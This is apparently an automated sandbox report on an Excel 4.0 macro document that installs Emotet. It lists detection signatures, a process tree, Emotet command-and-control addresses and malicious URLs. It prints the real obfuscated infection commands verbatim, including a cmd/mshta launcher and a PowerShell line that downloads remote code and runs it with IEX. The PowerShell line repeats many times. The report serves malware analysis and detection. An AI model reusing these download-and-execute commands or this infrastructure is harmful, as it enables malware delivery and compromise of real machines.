Play interactive tour

Edit tour

Windows Analysis Report ggnlRjkfr4

Overview

General Information

Sample Name:	ggnlRjkfr4 (renamed file extension from none to xls)
Analysis ID:	544305
MD5:	6c23aab5ed898b3b5629c8c6a91c96c3
SHA1:	603910f1c1df4c58bf59eec256d6957f0e0a9184
SHA256:	bb1f500a59544aa8e44a0377cc506dfbebca1ecb7a8c73dc72d3268803976ff5
Tags:	excelxlsx
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

Antivirus detection for URL or domain

Sigma detected: Suspicious MSHTA Process Patterns

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Found Excel 4.0 Macro with suspicious formulas

Obfuscated command line found

Tries to detect virtualization through RDTSC time measurements

Sigma detected: Mshta Spawning Windows Shell

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Enables debug privileges

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2188 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 1532 cmdline: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2696 cmdline: mshta http://87.251.86.178/pp/oo.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2628 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 2592 cmdline: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll ssd MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1208 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["54.37.212.235:80", "45.15.23.184:443", "41.76.108.46:8080", "212.237.5.209:443", "46.55.222.11:443", "207.38.84.195:8080", "103.8.26.102:8080", "138.185.72.26:8080", "104.251.214.46:8080", "110.232.117.186:8080", "51.68.175.8:8080", "176.104.106.96:8080", "216.158.226.206:443", "103.8.26.103:8080", "103.75.201.2:443", "210.57.217.132:8080", "195.154.133.20:443", "45.142.114.231:8080", "107.182.225.142:8080", "158.69.222.101:443", "45.118.115.99:8080", "192.254.71.210:443", "178.79.147.66:8080", "203.114.109.124:443", "212.237.56.116:7080", "173.212.193.249:8080", "58.227.42.236:80", "50.116.54.215:443", "162.214.50.39:7080", "45.118.135.203:7080", "212.237.17.99:8080", "81.0.236.90:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
ggnlRjkfr4.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0x6f9d:$e1: Enable Editing 0x6fdb:$e2: Enable Content
ggnlRjkfr4.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x33d2:$s1: Excel 0x7020:$s1: Excel 0xd0a2:$s1: Excel 0xe0d7:$s1: Excel 0xe120:$s1: Excel 0x3449:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
ggnlRjkfr4.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.577830349.0000000000602000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.577733868.0000000000180000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious MSHTA Process Patterns

Show sources

Source: Process started

Author: Florian Roth: Data: Command: mshta http://87.251.86.178/pp/oo.html, CommandLine: mshta http://87.251.86.178/pp/oo.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1532, ProcessCommandLine: mshta http://87.251.86.178/pp/oo.html, ProcessId: 2696

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, CommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2188, ProcessCommandLine: cmd /c m^sh^t^a h^tt^p^:/^/87.251.86.178/pp/oo.html, ProcessId: 1532

Sigma detected: Suspicious PowerShell Command Line

Show sources

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://87.251.86.178/pp/oo.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://87.251.86.178/pp/PP.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 984

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.2.rundll32.exe.180000.0.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["54.37.212.235:80", "45.15.23.184:443", "41.76.108.46:8080", "212.237.5.209:443", "46.55.222.11:443", "207.38.84.195:8080", "103.8.26.102:8080", "138.185.72.26:8080", "104.251.214.46:8080", "110.232.117.186:8080", "51.68.175.8:8080", "176.104.106.96:8080", "216.158.226.206:443", "103.8.26.103:8080", "103.75.201.2:443", "210.57.217.132:8080", "195.154.133.20:443", "45.142.114.231:8080", "107.182.225.142:8080", "158.69.222.101:443", "45.118.115.99:8080", "192.254.71.210:443", "178.79.147.66:8080", "203.114.109.124:443", "212.237.56.116:7080", "173.212.193.249:8080", "58.227.42.236:80", "50.116.54.215:443", "162.214.50.39:7080", "45.118.135.203:7080", "212.237.17.99:8080", "81.0.236.90:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Multi AV Scanner detection for submitted file

Show sources

Source: ggnlRjkfr4.xls

Virustotal: Detection: 11%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://87.251.86.178/pp/PP.PNG	Avira URL Cloud: Label: malware
Source: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/PE3	Avira URL Cloud: Label: malware
Source: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/PE3	Avira URL Cloud: Label: malware
Source: http://www.catholicroundup.com/wp-content/gF1nMkOSsT0Jq/	Avira URL Cloud: Label: malware
Source: http://sssilkplaster.in/argyrose/Jr8H2ybRNlh5Y/	Avira URL Cloud: Label: malware
Source: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/	Avira URL Cloud: Label: malware
Source: http://econews.site/content/pages/IxolPreOkVGdbI9OX/wNu12HviTj/PE3	Avira URL Cloud: Label: malware
Source: http://87.251.86.178/pp/oo.html	Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.665840625.0000000002977000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CB634 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,		8_2_729CB634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_729CB581 _free,_free,FindFirstFileExW,_free,		8_2_729CB581

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

DNS query: name: www.catholicroundup.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 87.251.86.178:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 87.251.86.178:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 54.37.212.235:80
Source: Malware configuration extractor	IPs: 45.15.23.184:443
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 210.57.217.132:8080
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 192.254.71.210:443
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 173.212.193.249:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 162.214.50.39:7080
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: global traffic	HTTP traffic detected: GET /pp/PP.PNG HTTP/1.1Host: 87.251.86.178Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/gF1nMkOSsT0Jq/ HTTP/1.1Host: www.catholicroundup.comConnection: Keep-Alive
